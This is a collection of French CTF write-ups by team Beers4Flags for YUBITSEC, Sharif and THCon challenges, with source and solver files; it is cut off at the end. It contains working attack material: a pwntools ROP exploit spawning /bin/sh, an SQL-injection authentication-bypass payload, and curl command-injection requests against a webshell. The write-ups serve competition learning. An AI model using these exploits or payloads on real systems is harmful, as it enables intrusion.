n=int("mon_modulo_en_hexa",16) 54 | sage : factor(n) 55 | ``` 56 | 57 | On récupère p & q 58 | on recréé les clé publique avec rsatool : 59 | 60 | ```BASH 61 | python rsatool.py -p mon_p -q mon_q -f PEM -o privkey.pem 62 | ``` 63 | 64 | On déchiffre : 65 | ```BASH 66 | openssl rsautl -decrypt -inkey privkey.pem -in cipher.txt 67 | ``` 68 | 69 | 70 | flag : YUBITSEC{S4V3_FL46} 71 | 72 | 73 | By team Beers4Flags 74 | 75 | 76 | ``` 77 | ________ 78 | | | 79 | | #BFF | 80 | |________| 81 | _.._,_|,_ 82 | ( | ) 83 | ]~,"-.-~~[ 84 | .=] Beers ([ 85 | | ]) 4 ([ 86 | '=]) Flags [ 87 | |:: ' | 88 | ~~----~~ 89 | ``` 90 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part1/PublicKey1.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITGqzTyQ0avf3d3hg19YqI8DaLnwIDAQAB 3 | -----END PUBLIC KEY----- 4 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part1/ciphertext1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part1/ciphertext1 -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part2/PublicKey2.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MC8wDQYJKoZIhvcNAQEBBQADHgAwGwIUA4rzHlmOJCtfzxswb9/w4tZu8jkCAwEA 3 | AQ== 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part2/ciphertext2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part2/ciphertext2 -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part3/PublicKey3.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITZXqQhCYQGvolUc/KJuOa9WRTJwIDAQAB 3 | -----END PUBLIC KEY----- 4 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/src/RSA/Part3/ciphertext3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa/src/RSA/Part3/ciphertext3 -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa2/readme.md: -------------------------------------------------------------------------------- 1 | **RSA 2 - Crypto - 350** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Can you decrypt these ciphertexts ? 7 | ``` 8 | [Sources](src/) 9 | 10 | __Résolution :__ 11 | 12 | On récupère les informations contenues dans la clé publique : 13 | 14 | ```BASH 15 | openssl rsa -in pubkey.pem -pubin -text -modulus 16 | ``` 17 | ``` 18 | Public-Key: (7470 bit) 19 | Modulus: 20 | 3f:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: 21 | ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: 22 | [...] 23 | 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 24 | 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 25 | 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 26 | 00:00:00:01 27 | Exponent: 65537 (0x10001) 28 | Modulus=3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF[...]0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 29 | -----BEGIN PUBLIC KEY----- 30 | MIIDxzANBgkqhkiG9w0BAQEFAAOCA7QAMIIDrwKCA6Y///////////////////// 31 | //////////////////////////////////////////////////////////////// 32 | [...] 33 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 34 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 35 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 36 | AAAAAAABAgMBAAE= 37 | -----END PUBLIC KEY----- 38 | ``` 39 | 40 | On passe le modulo de hexa à int : 41 | ``` 42 | sage : n=int("mon_modulo_en_hexa",16) 43 | ``` 44 | 45 | La longueur du modulo est trop élevé pour être factorisé directement 46 | 47 | On va voir si il a déjà été factorisé sur [factordb](http://factordb.com/) 48 | 49 | => full factorized : on a les deux facteurs p & q 50 | 51 | On recréé les clé publique avec rsatool : 52 | ```BASH 53 | python rsatool.py -p mon_p -q mon_q -f PEM -o privkey.pem 54 | ``` 55 | 56 | On déchiffre : 57 | 58 | ```BASH 59 | openssl rsautl -decrypt -inkey privkey.pem -in cipher.txt 60 | ``` 61 | 62 | YUBITSEC{G00D_J0B_BRO_Y0U_MUST_KN0W_H0W_D03S_1T_W0RKS} 63 | 64 | By team Beers4Flags 65 | 66 | 67 | ``` 68 | ________ 69 | | | 70 | | #BFF | 71 | |________| 72 | _.._,_|,_ 73 | ( | ) 74 | ]~,"-.-~~[ 75 | .=] Beers ([ 76 | | ]) 4 ([ 77 | '=]) Flags [ 78 | |:: ' | 79 | ~~----~~ 80 | ``` 81 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa2/src/PublicKey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIDxzANBgkqhkiG9w0BAQEFAAOCA7QAMIIDrwKCA6Y///////////////////// 3 | //////////////////////////////////////////////////////////////// 4 | //////////////////////////////////////////////////////////////// 5 | //////////////////////////////////////////////////////////////// 6 | //////////////////////////////////////////////////////////////// 7 | //////////////////////////////////////////////////////////////// 8 | //////////////////////////////////////////////////////////////// 9 | //////////////////////////////////////////////////////////////// 10 | //////////////////////////////////////////////////////////////// 11 | ///f//////////////////////////////////////////////////////////// 12 | //////////////////////////////////////////////////////////////// 13 | ///////////////////////////////////////////////+AAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAABAgMBAAE= 23 | -----END PUBLIC KEY----- 24 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa2/src/ciphertext: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/rsa2/src/ciphertext -------------------------------------------------------------------------------- /2017/yubitsec/crypto/simple_encryption/readme.md: -------------------------------------------------------------------------------- 1 | **Simple Encryption - Crypto - 175** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Deux fichiers sont mis à notre disposition : 7 | 8 | 1 - Un chiffré 9 | 2 - Le script python pour chiffrer 10 | ``` 11 | [Sources](src/) 12 | 13 | __Résolution :__ 14 | 15 | Le script de "chiffrement" xor chaque caractère (passé en décimal) avec le nombre 62. 16 | 17 | Il suffit de faire de même pour retrouver le flag en clair. 18 | 19 | 20 | ```PYTHON 21 | encrypted=[103,107,124,119,106,109,123,125,69,73,91,82,82,97,89,76,91,95,74,67] 22 | char="" 23 | for nb in encrypted: 24 | char+=chr(nb^62) 25 | print char 26 | ``` 27 | YUBITSEC{well_great} 28 | 29 | By team Beers4Flags 30 | 31 | 32 | ``` 33 | ________ 34 | | | 35 | | #BFF | 36 | |________| 37 | _.._,_|,_ 38 | ( | ) 39 | ]~,"-.-~~[ 40 | .=] Beers ([ 41 | | ]) 4 ([ 42 | '=]) Flags [ 43 | |:: ' | 44 | ~~----~~ 45 | ``` 46 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/simple_encryption/src/encrypted: -------------------------------------------------------------------------------- 1 | 20 20 20 108 123 122 127 125 106 123 122 20 20 20 -------------------------------------------------------------------------------- /2017/yubitsec/crypto/simple_encryption/src/simple_enc.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | f = open("encrypted","w") 4 | 5 | secret = "***REDACTED***" 6 | 7 | 8 | 9 | def enc_af(text): 10 | temp = "" 11 | for char in text: 12 | temp += str(ord(char)^62) + " " 13 | 14 | return temp 15 | 16 | 17 | 18 | f.write(enc_af(secret)) 19 | -------------------------------------------------------------------------------- /2017/yubitsec/stegano/blushes/img/indir.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/blushes/img/indir.png -------------------------------------------------------------------------------- /2017/yubitsec/stegano/blushes/img/solved.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/blushes/img/solved.bmp -------------------------------------------------------------------------------- /2017/yubitsec/stegano/blushes/readme.md: -------------------------------------------------------------------------------- 1 | **Blushes - Stegano - 50** 2 | 3 | Enoncé : 4 | 5 | 6 | ![Alt](img/indir.png "enonce") 7 | 8 | 9 | __Résolution :__ 10 | 11 | En analysant l'image avec stegsolve on remarque un qrcode sur tous les filtres RGB. 12 | 13 | 14 | ![Alt](img/solved.bmp "qrcode") 15 | 16 | On upload le qrcode sur ce site : 17 | [Decode qrcode](https://zxing.org/) 18 | 19 | 20 | On obtient le flag : 21 | YUBITSEC{hello_nothing_here} 22 | 23 | By team Beers4Flags 24 | 25 | 26 | ``` 27 | ________ 28 | | | 29 | | #BFF | 30 | |________| 31 | _.._,_|,_ 32 | ( | ) 33 | ]~,"-.-~~[ 34 | .=] Beers ([ 35 | | ]) 4 ([ 36 | '=]) Flags [ 37 | |:: ' | 38 | ~~----~~ 39 | ``` 40 | -------------------------------------------------------------------------------- /2017/yubitsec/stegano/falkreath/img/ciceros.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/falkreath/img/ciceros.jpg -------------------------------------------------------------------------------- /2017/yubitsec/stegano/falkreath/readme.md: -------------------------------------------------------------------------------- 1 | **Falkreath - Stegano - 100** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | What is the music of life? 7 | ``` 8 | 9 | ![Alt](img/ciceros.jpg "ciceros") 10 | 11 | 12 | __Résolution :__ 13 | 14 | Après quelques recherche sur internet on trouve : 15 | 16 | [forum skyrim](https://www.gamefaqs.com/boards/615803-the-elder-scrolls-v-skyrim/61368267) 17 | ```BASH 18 | steghide --extract -sf ciceros.jpg 19 | 20 | mot de passe : silence 21 | ``` 22 | 23 | Le flag s'extrait : 24 | 25 | YUBITSEC{welcome_home!} 26 | 27 | 28 | By team Beers4Flags 29 | 30 | 31 | ``` 32 | ________ 33 | | | 34 | | #BFF | 35 | |________| 36 | _.._,_|,_ 37 | ( | ) 38 | ]~,"-.-~~[ 39 | .=] Beers ([ 40 | | ]) 4 ([ 41 | '=]) Flags [ 42 | |:: ' | 43 | ~~----~~ 44 | ``` 45 | -------------------------------------------------------------------------------- /2017/yubitsec/stegano/text_into_image/img/lsb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/stegano/text_into_image/img/lsb.png -------------------------------------------------------------------------------- /2017/yubitsec/stegano/text_into_image/readme.md: -------------------------------------------------------------------------------- 1 | **Text into image - Stegano - 150** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Shaco is hiding something! 7 | ``` 8 | 9 | ![Alt](img/lsb.png "lsb") 10 | 11 | 12 | __Résolution :__ 13 | 14 | Le nom de l'image nous fait tout de suite penser à du LSB. 15 | 16 | En analysant l'image avec stegsolve on remarque des traces de points en colonnes sur les positions 0 et 1 des couleurs RGB. 17 | 18 | On upload l'image sur ce site : 19 | [Stegano_online](http://manytools.org/hacker-tools/steganography-encode-text-into-image/go) 20 | 21 | 22 | On obtient le flag : 23 | YUBITSEC{now_you_see_me} 24 | 25 | 26 | By team Beers4Flags 27 | 28 | 29 | ``` 30 | ________ 31 | | | 32 | | #BFF | 33 | |________| 34 | _.._,_|,_ 35 | ( | ) 36 | ]~,"-.-~~[ 37 | .=] Beers ([ 38 | | ]) 4 ([ 39 | '=]) Flags [ 40 | |:: ' | 41 | ~~----~~ 42 | ``` 43 | -------------------------------------------------------------------------------- /2017/yubitsec/warmup/bash/readme.md: -------------------------------------------------------------------------------- 1 | **Bash - Warmup - 5** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | BFYRGHVX{ZGYZHS_MLG_DVOXLNV_SVIV} 7 | ``` 8 | 9 | __Résolution :__ 10 | 11 | C'est de l'atbash (transformation hebreux) 12 | 13 | On le décode sur : [dcode](http://www.dcode.fr/chiffre-miroir-atbash) 14 | 15 | YUBITSEC{ATBASH_NOT_WELCOME_HERE} 16 | 17 | 18 | By team Beers4Flags 19 | 20 | 21 | ``` 22 | ________ 23 | | | 24 | | #BFF | 25 | |________| 26 | _.._,_|,_ 27 | ( | ) 28 | ]~,"-.-~~[ 29 | .=] Beers ([ 30 | | ]) 4 ([ 31 | '=]) Flags [ 32 | |:: ' | 33 | ~~----~~ 34 | ``` 35 | -------------------------------------------------------------------------------- /2017/yubitsec/web/webshell/img/shell_as_service.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/web/webshell/img/shell_as_service.png -------------------------------------------------------------------------------- /2017/yubitsec/web/webshell/readme.md: -------------------------------------------------------------------------------- 1 | **Webshell - Web - 300** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Now somebody uploaded a web shell to my web server. What a nice guy hurray! 7 | 8 | http://138.197.41.168:8081/ 9 | 10 | HINT: I think somebody used some commands already but I could not figure how to find them. 11 | 12 | ``` 13 | 14 | ![Alt](img/shell_as_service.png "shell_as_service.png") 15 | 16 | 17 | __Résolution :__ 18 | 19 | On injecte tout d'abord une commande de base : 20 | ```BASH 21 | curl -XPOST http://138.197.41.168:8081/ --data "command=ls" 22 | 23 | index.php shell.jpg flag.txt 24 | ``` 25 | 26 | Le fichier flag.txt n'est pas directement accessible. 27 | 28 | Le hint donné nous donne un sacré indice sur la commande à injecter : 29 | 30 | ```BASH 31 | curl -XPOST http://138.197.41.168:8081/ --data "command=history" 32 | 33 | 1 ZXh0c 34 | 2 mFfc2 35 | 3 VjdXJ 36 | 4 lX2Zp 37 | 5 bGVfc 38 | 6 mVhZG 39 | 7 Vy 40 | 41 | ``` 42 | On décode le base64 : 43 | 44 | ```BASH 45 | echo -n 'ZXh0c mFfc2 VjdXJ lX2Zp bGVfc mVhZG Vy' | base64 -di 46 | 47 | extra_secure_file_reader 48 | ``` 49 | On va lire le fichier qui nous intéresse 50 | 51 | ```BASH 52 | 53 | curl -XPOST http://138.197.41.168:8081/ --data "command=extra_secure_file_reader flag.txt" 54 | 55 | YUBITSEC{shello_shello_are_you_thereo} 56 | 57 | ``` 58 | 59 | 60 | By team Beers4Flags 61 | 62 | 63 | ``` 64 | ________ 65 | | | 66 | | #BFF | 67 | |________| 68 | _.._,_|,_ 69 | ( | ) 70 | ]~,"-.-~~[ 71 | .=] Beers ([ 72 | | ]) 4 ([ 73 | '=]) Flags [ 74 | |:: ' | 75 | ~~----~~ 76 | ``` 77 | -------------------------------------------------------------------------------- /2018/Inshack/Forensic/Worm-in-apple/source/DoxyDoxygen.sublime-package: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Forensic/Worm-in-apple/source/DoxyDoxygen.sublime-package -------------------------------------------------------------------------------- /2018/Inshack/Web/Crimemail/img/accueil.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/accueil.png -------------------------------------------------------------------------------- /2018/Inshack/Web/Crimemail/img/detect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/detect.png -------------------------------------------------------------------------------- /2018/Inshack/Web/Crimemail/img/sqli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Inshack/Web/Crimemail/img/sqli.png -------------------------------------------------------------------------------- /2018/Sharif/Pwn250-t00p_secrets/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Sharif 4 | date: 3 Février 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename t00p_secrets 12 | File format ELF64 13 | Architecture x86-64 14 | Endianess little endian 15 | Entry point 0x4008f0 16 | Loadables segments 2 17 | Sections 27 18 | 19 | NX bit enabled 20 | SSP enabled 21 | Relro full 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE disabled 25 | ``` 26 | Le binaire présent un off-by-one permettant de modifier le champs previous-use 27 | d'un chunk. On va donc pouvoir faire un safe unlink en faisant 28 | [fake chunk][0...0][taille chunk]|ecrituee d'un 0 sur la longueur d'un bloc 29 | de taille 0x200, le bloc précédent sera marqué comme libre. 30 | 31 | On libère le bloc et cela crée une entrée (numero 4) dans la liste des secrets 32 | permettant de modifier une autre entrée (la numéro 1). 33 | 34 | On affiche alors la got de puts, on en déduit la libc (xenial 2.23), puis 35 | on met __free_hook vers 6 et on détruit le secret 0 contenant /bin/sh. 36 | 37 | On a alors un shell. 38 | -------------------------------------------------------------------------------- /2018/Sharif/Pwn250-t00p_secrets/t00p_secrets: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn250-t00p_secrets/t00p_secrets -------------------------------------------------------------------------------- /2018/Sharif/Pwn75-leak_puts/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Sharif 4 | date: 3 Février 2018 5 | comments: true 6 | categories: wu 7 | auteur: jambon69 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename vuln4 12 | File format ELF32 13 | Architecture x86 14 | Endianess little endian 15 | 16 | NX bit enabled 17 | Relro disabled 18 | PIE disabled 19 | 20 | ``` 21 | 22 | Le binaire nous demande de trouver nous même l'addresse de puts, avec un read sur stdin juste après. 23 | 24 | On va donc générer une première ropchain qui va leak l'addresse de puts et puis rejump sur le main. 25 | Une fois l'addresse de puts obtenue, on peut récupérer l'addresse de system (sachant que la libc utilisée nous est fournie). 26 | 27 | Il reste plus qu'à envoyer une deuxième ropchaine qui va exéctuer /bin/sh, et le tour est joué 28 | -------------------------------------------------------------------------------- /2018/Sharif/Pwn75-leak_puts/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | import struct 5 | 6 | context(arch = 'x86', os = 'linux', endian = 'little', word_size = 32, log_level = 'info') 7 | 8 | HOST = 'ctf.sharif.edu' 9 | PORT = 4801 10 | # p = remote(HOST, PORT) 11 | 12 | p = process('./vuln4') 13 | elf = ELF('./vuln4') 14 | libc = ELF('libc.so.6') 15 | 16 | rop = ROP(elf) 17 | 18 | rop.puts(elf.got['puts']) 19 | rop.call(elf.symbols['main']) 20 | 21 | print rop.dump() 22 | 23 | payload = "A"*22 24 | payload += str(rop) 25 | 26 | print p.recvuntil("You should find puts yourself") 27 | p.sendline(payload) 28 | leak = p.recvuntil("You should find puts yourself") # => leak puts 29 | 30 | leaked_puts = leak[1:5].strip() 31 | leaked_puts = struct.unpack('I', leaked_puts)[0] 32 | 33 | log.info("PUTS: " + str(hex(leaked_puts))) 34 | 35 | # Rebase libc to the leaked offset 36 | libc.address = leaked_puts - libc.symbols['puts'] 37 | log.info("LIBC: " + str(hex(libc.address))) 38 | 39 | rop2 = ROP(libc) 40 | rop2.system(next(libc.search('/bin/sh\x00'))) 41 | # rop2.call(elf.symbols['main']) 42 | 43 | print rop2.dump() 44 | 45 | payload = "A"*22 46 | payload += str(rop2) 47 | 48 | p.clean() 49 | p.sendline(payload) 50 | 51 | print "[+] Enjoy your shell" 52 | p.interactive() 53 | # print p.recvuntil("done!") 54 | 55 | # print rop.dump() 56 | p.close() 57 | -------------------------------------------------------------------------------- /2018/Sharif/Pwn75-leak_puts/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn75-leak_puts/libc.so.6 -------------------------------------------------------------------------------- /2018/Sharif/Pwn75-leak_puts/vuln4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn75-leak_puts/vuln4 -------------------------------------------------------------------------------- /2018/Sharif/Web/Hidden-Input/img/burp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/burp.png -------------------------------------------------------------------------------- /2018/Sharif/Web/Hidden-Input/img/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/login.png -------------------------------------------------------------------------------- /2018/Sharif/Web/Hidden-Input/img/sql.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/sql.png -------------------------------------------------------------------------------- /2018/Sharif/Web/Hidden-Input/readme.md: -------------------------------------------------------------------------------- 1 | **Web - Hidden input - 50pts** 2 | 3 | ![Alt](img/login.png "Accueil") 4 | 5 | Enoncé : 6 | ``` 7 | Login if you can :) 8 | ``` 9 | 10 | **Résolution :** 11 | 12 | Un champs caché **debug** est présent sur la page de login, par défaut il est défini à 0. 13 | 14 | Après plusieurs tests d'authentification aucune erreur n'est renvoyée. 15 | 16 | Par contre le si on défini le champs **debug** à 1 et que l'on tente une injection SQL on obtient : 17 | 18 | ![Alt](img/sql.png "SQLI") 19 | 20 | Il faut alors créer un payload permettant de bypasser l'authentification : 21 | 22 | ``` 23 | Username=admin') OR 1=1#&Password=test&debug=1 24 | ``` 25 | On exécute la requête : 26 | 27 | ![Alt](img/burp.png "Flag") 28 | 29 | ``` 30 | Le flag est : SharifCTF{c58a108967c46222bbdc743e15932c26} 31 | ``` 32 | 33 | 34 | 35 | 36 | By team Beers4Flags 37 | 38 | 39 | ``` 40 | ________ 41 | | | 42 | | #BFF | 43 | |________| 44 | _.._,_|,_ 45 | ( | ) 46 | ]~,"-.-~~[ 47 | .=] Beers ([ 48 | | ]) 4 ([ 49 | '=]) Flags [ 50 | |:: ' | 51 | ~~----~~ 52 | ``` 53 | -------------------------------------------------------------------------------- /2018/Sharif/Web/The-News-Hacker/img/admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/admin.png -------------------------------------------------------------------------------- /2018/Sharif/Web/The-News-Hacker/img/burp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/burp.png -------------------------------------------------------------------------------- /2018/Sharif/Web/The-News-Hacker/img/wordpress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/wordpress.png -------------------------------------------------------------------------------- /2018/Thcon/Network/50/readme.md: -------------------------------------------------------------------------------- 1 | **Network - DockerLeak - 50pts** 2 | 3 | 4 | Enoncé : 5 | ``` 6 | During the deployment of the challenges of the THC, an attacker was able to dump the network traffic. 7 | 8 | Can you find the flag? 9 | ``` 10 | 11 | On commence avec un fichier dump.pcap [Sources](sources/dump.pcap) 12 | 13 | **Résolution :** 14 | 15 | Comme tout challenge à 50 points l'option la plus rapide est souvent la commande strings : 16 | 17 | ```BASh 18 | strings dump.pcap | grep -A1 -i THC{ 19 | #define FLAG "THC{d0c4ErSo(ke!m 20 | 5T_U5e_HtT6S}" 21 | 22 | ``` 23 | 24 | Flag : 25 | 26 | ``` 27 | THC{d0c4ErSo(ke!m5T_U5e_HtT6S} 28 | ``` 29 | 30 | 31 | 32 | 33 | By team Beers4Flags 34 | 35 | 36 | ``` 37 | ________ 38 | | | 39 | | #BFF | 40 | |________| 41 | _.._,_|,_ 42 | ( | ) 43 | ]~,"-.-~~[ 44 | .=] Beers ([ 45 | | ]) 4 ([ 46 | '=]) Flags [ 47 | |:: ' | 48 | ~~----~~ 49 | ``` 50 | -------------------------------------------------------------------------------- /2018/Thcon/Network/50/sources/dump.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Network/50/sources/dump.pcap -------------------------------------------------------------------------------- /2018/Thcon/Reverse/200-android/THC.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/200-android/THC.apk -------------------------------------------------------------------------------- /2018/Thcon/Reverse/200-android/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from z3 import * 4 | import os 5 | 6 | solver = Solver() 7 | 8 | # Define the serial characters 9 | c0 = Int('c0') 10 | c1 = Int('c1') 11 | c2 = Int('c2') 12 | c3 = Int('c3') 13 | c4 = Int('c4') 14 | c5 = Int('c5') 15 | c6 = Int('c6') 16 | c7 = Int('c7') 17 | c8 = Int('c8') 18 | c9 = Int('c9') 19 | c10 = Int('c10') 20 | c11 = Int('c11') 21 | c12 = Int('c12') 22 | c13 = Int('c13') 23 | c14 = Int('c14') 24 | c15 = Int('c15') 25 | c16 = Int('c16') 26 | c17 = Int('c17') 27 | c18 = Int('c18') 28 | c19 = Int('c19') 29 | 30 | # Define the possible values for each characters, 31 | # from ' ' and '~' (printable char). 32 | solver.add((c0 >= 0x20, c0 <=0x7e)) 33 | solver.add((c1 >= 0x20, c1 <=0x7e)) 34 | solver.add((c2 >= 0x20, c2 <=0x7e)) 35 | solver.add((c3 >= 0x20, c3 <=0x7e)) 36 | solver.add((c4 >= 0x20, c4 <=0x7e)) 37 | solver.add((c5 >= 0x20, c5 <=0x7e)) 38 | solver.add((c6 >= 0x20, c6 <=0x7e)) 39 | solver.add((c7 >= 0x20, c7 <=0x7e)) 40 | solver.add((c8 >= 0x20, c8 <=0x7e)) 41 | solver.add((c9 >= 0x20, c9 <=0x7e)) 42 | solver.add((c10 >= 0x20, c10 <=0x7e)) 43 | solver.add((c11 >= 0x20, c11 <=0x7e)) 44 | solver.add((c12 >= 0x20, c12 <=0x7e)) 45 | solver.add((c13 >= 0x20, c13 <=0x7e)) 46 | solver.add((c14 >= 0x20, c14 <=0x7e)) 47 | solver.add((c15 >= 0x20, c15 <=0x7e)) 48 | solver.add((c16 >= 0x20, c16 <=0x7e)) 49 | solver.add((c17 >= 0x20, c17 <=0x7e)) 50 | solver.add((c18 >= 0x20, c18 <=0x7e)) 51 | solver.add((c19 >= 0x20, c19 <=0x7e)) 52 | 53 | # Define the constraints that have been 54 | # founded in MainActivity.class. 55 | solver.add(c4 == 45) 56 | solver.add(c9 == 45) 57 | solver.add(c14 == 45) 58 | solver.add(c5 == (c6 + 1)) 59 | solver.add(c5 == c18) 60 | solver.add(c1 == c18 % 4 * 22) 61 | solver.add(c10 == 